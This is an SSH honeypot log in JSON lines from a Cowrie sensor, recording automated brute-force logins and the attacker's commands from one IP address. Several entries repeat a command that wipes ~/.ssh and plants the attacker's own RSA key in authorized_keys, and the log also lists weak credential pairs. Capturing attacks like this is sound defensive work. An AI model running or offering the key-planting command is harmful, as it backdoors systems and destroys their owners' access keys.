{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:03:37.919139Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48440,"dst_ip":"1.2.3.4","dst_port":22,"session":"59298e0987d8","protocol":"ssh","message":"New connection: 212.227.235.229:48440 (1.2.3.4:22) [session: 59298e0987d8]","sensor":"my-vps","timestamp":"2025-08-31T06:03:37.921688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:03:37.922522Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:03:38.196172Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:03:38.206129Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:38.207665Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60416,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c20ceb6ea64","protocol":"ssh","message":"New connection: 212.227.235.229:60416 (1.2.3.4:22) [session: 9c20ceb6ea64]","sensor":"my-vps","timestamp":"2025-08-31T06:03:38.496649Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:03:38.497715Z","src_ip":"212.227.235.229","session":"9c20ceb6ea64"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:03:38.787335Z","src_ip":"212.227.235.229","session":"9c20ceb6ea64"}
{"eventid":"cowrie.login.success","username":"root","password":"090909","message":"login attempt [root/090909] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:03:39.289597Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:03:39.857186Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:03:39.857859Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:03:39.858636Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:03:39.988868Z","src_ip":"212.227.235.229","session":"9c20ceb6ea64"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:40.133282Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:03:40.741058Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:03:40.741751Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.017472Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.018450Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.280867Z","src_ip":"212.227.235.229","session":"9c20ceb6ea64"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37186,"dst_ip":"1.2.3.4","dst_port":22,"session":"99cdc1f29ccd","protocol":"ssh","message":"New connection: 212.227.235.229:37186 (1.2.3.4:22) [session: 99cdc1f29ccd]","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.289454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.290442Z","src_ip":"212.227.235.229","session":"99cdc1f29ccd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.562454Z","src_ip":"212.227.235.229","session":"99cdc1f29ccd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33422,"dst_ip":"1.2.3.4","dst_port":22,"session":"35e3e0d4fc96","protocol":"ssh","message":"New connection: 212.227.235.229:33422 (1.2.3.4:22) [session: 35e3e0d4fc96]","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.565606Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.566197Z","src_ip":"212.227.235.229","session":"35e3e0d4fc96"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.853668Z","src_ip":"212.227.235.229","session":"35e3e0d4fc96"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37434,"dst_ip":"1.2.3.4","dst_port":22,"session":"f92e9da8f2da","protocol":"ssh","message":"New connection: 212.227.235.229:37434 (1.2.3.4:22) [session: f92e9da8f2da]","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.995410Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:03:41.996372Z","src_ip":"212.227.235.229","session":"f92e9da8f2da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:03:42.255509Z","src_ip":"212.227.235.229","session":"f92e9da8f2da"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:03:42.689927Z","src_ip":"212.227.235.229","session":"99cdc1f29ccd"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"123456","message":"login attempt [deploy/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T06:03:42.815479Z","src_ip":"212.227.235.229","session":"dc793c92bdf6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:03:43.041466Z","src_ip":"212.227.235.229","session":"35e3e0d4fc96"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"q1w2e3r4t5","message":"login attempt [deployer/q1w2e3r4t5] failed","sensor":"my-vps","timestamp":"2025-08-31T06:03:43.283628Z","src_ip":"212.227.235.229","session":"f92e9da8f2da"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:43.328727Z","src_ip":"212.227.235.229","session":"7f8333d577b6"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:43.329810Z","src_ip":"212.227.235.229","session":"35e3e0d4fc96"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:43.963818Z","src_ip":"212.227.235.229","session":"99cdc1f29ccd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37190,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e28e768264c","protocol":"ssh","message":"New connection: 212.227.235.229:37190 (1.2.3.4:22) [session: 1e28e768264c]","sensor":"my-vps","timestamp":"2025-08-31T06:03:44.238264Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:03:44.238965Z","src_ip":"212.227.235.229","session":"1e28e768264c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:03:44.516085Z","src_ip":"212.227.235.229","session":"1e28e768264c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:44.542583Z","src_ip":"212.227.235.229","session":"f92e9da8f2da"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:03:45.666997Z","src_ip":"212.227.235.229","session":"1e28e768264c"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:45.945942Z","src_ip":"212.227.235.229","session":"1e28e768264c"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:45.946863Z","src_ip":"212.227.235.229","session":"59298e0987d8"}
{"eventid":"cowrie.session.closed","duration":31.2481849193573,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:48.995400Z","src_ip":"212.227.235.229","session":"aaf3ecd203d8"}
{"eventid":"cowrie.session.closed","duration":"20.4","message":"Connection lost after 20.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:50.166788Z","src_ip":"212.227.125.160","session":"6176ebec631c"}
{"eventid":"cowrie.session.closed","duration":"62.4","message":"Connection lost after 62.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:03:56.991192Z","src_ip":"212.227.235.229","session":"dc793c92bdf6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37406,"dst_ip":"1.2.3.4","dst_port":22,"session":"2845b472192b","protocol":"ssh","message":"New connection: 212.227.235.229:37406 (1.2.3.4:22) [session: 2845b472192b]","sensor":"my-vps","timestamp":"2025-08-31T06:04:02.918814Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:04:02.919887Z","src_ip":"212.227.235.229","session":"2845b472192b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:04:03.223048Z","src_ip":"212.227.235.229","session":"2845b472192b"}
{"eventid":"cowrie.login.failed","username":"rd","password":"P@ssw0rd","message":"login attempt [rd/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-31T06:04:04.477918Z","src_ip":"212.227.235.229","session":"2845b472192b"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:04:05.783437Z","src_ip":"212.227.235.229","session":"2845b472192b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56992,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8c9c82f5097","protocol":"ssh","message":"New connection: 212.227.235.229:56992 (1.2.3.4:22) [session: c8c9c82f5097]","sensor":"my-vps","timestamp":"2025-08-31T06:04:11.105419Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34765,"dst_ip":"1.2.3.4","dst_port":22,"session":"315a7d6e8601","protocol":"ssh","message":"New connection: 212.227.235.229:34765 (1.2.3.4:22) [session: 315a7d6e8601]","sensor":"my-vps","timestamp":"2025-08-31T06:04:11.796972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:04:12.022592Z","src_ip":"212.227.235.229","session":"315a7d6e8601"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:04:12.104372Z","src_ip":"212.227.235.229","session":"c8c9c82f5097"}
